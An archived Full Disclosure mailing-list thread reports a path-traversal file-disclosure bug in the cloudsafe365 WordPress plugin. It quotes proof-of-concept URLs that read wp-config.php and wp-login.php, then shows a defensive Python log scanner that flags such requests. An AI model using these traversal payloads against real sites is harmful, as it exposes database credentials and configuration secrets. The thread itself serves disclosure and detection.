Full Disclosure mailing list archives
Re: cloudsafe365 for wordpress: file disclosure
From: Christian Sciberras <uuf6429 () gmail com>
Date: Tue, 28 Aug 2012 11:00:25 +0200
So this plugin supposedly helps securing a website? ...

On Tue, Aug 28, 2012 at 10:50 AM, Henri Salo <henri () nerv fi> wrote:
> On Tue, Aug 28, 2012 at 10:29:46AM +0200, Jan van Niekerk wrote:
> > This wordpress security plugin lets you read arbitrary files on the system.
> > Looking at the code, there will be plenty of stuff like this.
> >
> > Demo:
> > http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php
> > http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php
> >
> > Disclosure timeline:
> > * Today: visit wordpress.org
> > * Try to report bug
> > * System wants login
> > * Visit web site: vendor has no e-mail address and stupid one-liner contact form and hidden name
> > * Stuff it, I'm not going to phone them
>
> I can verify and report this. Could you list all the vulnerabilities you can find from the plugin? You can also contact plugins@wordpress.org address in case you found vulnerabilities from WordPress plugins in the future.
>
> - Henri Salo
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
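A defender-side check for the request pattern reported in this thread, added here as an example (it is not part of the original messages or of the plugin's code): it scans web access logs for requests to the reported endpoint whose `file` parameter resolves outside its base directory. The combined log format, the function names and the sample log entries are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint and parameter named in the report; the log format is an assumption.
EDITOR_PATH = "/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php"
PARAM = "file"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so encoded separators cannot hide '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def escapes_base(value):
    """True if a path is absolute or climbs above the directory it is resolved against."""
    path = fully_decode(value).replace("\\", "/")
    if path.startswith("/") or "\x00" in path:
        return True  # absolute path or NUL byte: never a legitimate relative name
    normalized = posixpath.normpath(path)
    return normalized == ".." or normalized.startswith("../")

def suspicious_requests(log_lines):
    """Return (line_number, http_status, decoded_value) for each flagged request."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith(EDITOR_PATH):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            if escapes_base(value):
                hits.append((number, int(match.group(2)), fully_decode(value)))
    return hits

# Constructed sample entries (documentation IP ranges), not from a real server.
SAMPLE_LOG = [
    f'203.0.113.7 - - [28/Aug/2012:10:31:02 +0200] "GET {EDITOR_PATH}?file=../../../../../wp-config.php HTTP/1.1" 200 3120',
    f'203.0.113.7 - - [28/Aug/2012:10:31:09 +0200] "GET {EDITOR_PATH}?file=%2e%2e%2f%2e%2e%2fwp-login.php HTTP/1.1" 403 199',
    f'198.51.100.4 - - [28/Aug/2012:10:40:15 +0200] "GET {EDITOR_PATH}?file=notes/../readme.txt HTTP/1.1" 200 512',
    '198.51.100.4 - - [28/Aug/2012:10:41:00 +0200] "GET /index.php?file=../x HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A flagged entry with status 200 is the one to triage first, since the server returned a body for that request.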
Current thread:
- cloudsafe365 for wordpress: file disclosure Jan van Niekerk (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Henri Salo (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Christian Sciberras (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Henri Salo (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Ivan Carlos (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Christian Sciberras (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure Henri Salo (Aug 28)
- Re: cloudsafe365 for wordpress: file disclosure craig deveson (Aug 28)